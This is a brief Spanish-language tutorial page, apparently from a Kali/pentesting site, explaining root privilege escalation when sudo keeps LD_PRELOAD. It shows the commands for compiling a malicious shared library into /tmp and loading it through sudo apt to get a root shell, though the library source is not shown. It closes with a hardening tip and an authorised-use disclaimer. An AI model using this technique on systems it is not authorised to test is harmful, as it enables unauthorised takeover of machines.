KALI
Privesc con ld_preload
Si en la configuración de sudo aparece env_keep con LD_PRELOAD, tienes una escalada regalada.
LD_PRELOAD obliga a cargar una librería tuya antes que las del sistema. Compilas una librería mínima que, al cargarse, lanza una shell de root, y luego ejecutas cualquier comando con sudo pasándole tu librería.
Como sudo corre como root y respeta tu variable, la shell sale con privilegios. Nunca dejes env_keep con variables de carga.
# los comandos
www-data@victim:$ sudo -lcopiarenv_keep += LD_PRELOAD
(root) NOPASSWD: /usr/bin/apt
www-data@victim:$ gcc -fPIC -shared -o /tmp/x.so evil.c -nostartfilescopiarwww-data@victim:$ sudo LD_PRELOAD=/tmp/x.so apt updatecopiarroot@victim:# idcopiaruid=0(root)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.